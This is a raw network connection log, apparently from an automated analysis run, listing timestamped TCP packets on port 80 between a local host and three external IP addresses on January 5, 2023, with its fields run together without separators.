                                                                                                                                                                                    Jan 5, 2023 08:58:28.617084980 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617146969 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617209911 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617261887 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617271900 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617317915 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617326975 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617388010 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617434025 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617484093 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617496014 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617542982 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617556095 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617619038 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617679119 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617724895 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617738962 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617783070 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617804050 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617863894 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617923975 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617969036 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.617985964 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618029118 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618046045 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618104935 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618166924 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618212938 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618227005 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618271112 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618290901 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618345976 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618407965 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618455887 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618467093 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618510008 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618525028 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618585110 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618629932 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618648052 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618740082 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618804932 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618859053 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618869066 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618912935 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618930101 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.618989944 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619036913 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619087934 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619100094 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619143963 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619162083 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619227886 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619291067 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619297981 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619362116 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619424105 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619482994 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619494915 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619540930 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619541883 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619606018 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619672060 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619683981 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619734049 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619801044 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619853020 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619853020 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619898081 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619920015 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.619987011 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.620054007 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.620107889 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.620116949 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.620158911 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.667272091 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.667372942 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.667439938 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.667498112 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.667543888 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.667560101 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.667579889 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.667624950 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.667679071 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.667689085 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.667748928 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.667804956 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.667865992 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.667866945 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.667923927 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.667973995 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.667980909 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668096066 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668154001 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668174028 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668206930 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668210030 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668271065 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668339968 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668401957 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668404102 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668443918 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668462992 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668525934 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668581963 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668643951 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668647051 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668701887 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668704033 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668751955 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668809891 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668869972 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668874979 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668926954 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668929100 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.668997049 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669061899 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669118881 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669143915 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669182062 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669183016 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669240952 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669306993 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669353008 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669387102 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669435978 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669445038 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669492006 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669524908 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669558048 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669609070 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669621944 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669671059 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669682980 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669744968 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669815063 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669871092 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669877052 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669915915 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669934988 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.669992924 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670052052 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670098066 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670101881 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670150042 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670165062 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670222044 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670284033 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670345068 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670348883 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670406103 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670414925 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670480013 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670542955 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670599937 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670608044 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670660973 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670675039 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670775890 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670825958 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670835018 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670885086 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670947075 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.670994997 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671008110 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671051025 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671070099 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671132088 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671190977 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671236038 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671251059 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671319008 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671366930 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671380043 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671422005 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671442032 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671502113 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671564102 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671610117 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671627045 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671669006 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671686888 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671749115 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671809912 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671858072 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671870947 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671920061 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671930075 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.671991110 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672035933 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672051907 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672113895 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672174931 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672224045 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672225952 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672278881 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672288895 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672353983 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672415972 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672466993 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672475100 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672517061 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672535896 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672595024 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672656059 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672703981 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672713995 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672755957 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672775030 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.672827959 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:28.673656940 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:29.589577913 CET4974080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.650989056 CET804974062.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.653759003 CET4974080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.663811922 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.724114895 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.724278927 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.781478882 CET4974080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.787602901 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.842715979 CET804974062.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.847852945 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.847889900 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.847910881 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.847932100 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.847953081 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.847971916 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.847991943 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.848036051 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.848040104 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.848061085 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.848078966 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.848092079 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.848099947 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.848119020 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.848119020 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.848134041 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.848145962 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.848175049 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.856204987 CET804974062.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.859469891 CET4974080192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.901288033 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908399105 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908432007 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908451080 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908469915 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908505917 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908525944 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908545971 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908546925 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908546925 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908546925 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908565044 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908585072 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908612013 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908612013 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908643961 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908651114 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908663988 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908677101 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908684015 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908700943 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908705950 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908730984 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908730984 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908741951 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908760071 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908776999 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908819914 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908847094 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.908992052 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.909013033 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.909032106 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.909049988 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.909068108 CET804974162.204.41.109192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.909073114 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.909073114 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.909116030 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.909116030 CET4974180192.168.2.462.204.41.109
                                                                                                                                                                                    Jan 5, 2023 08:58:29.928637028 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.928764105 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.932732105 CET4974280192.168.2.445.66.230.123
                                                                                                                                                                                    Jan 5, 2023 08:58:29.959939003 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.960025072 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.960051060 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.960071087 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.960091114 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.960110903 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.960130930 CET804974245.66.230.123192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:29.960130930 CET4974280192.168.2.445.66.230.123
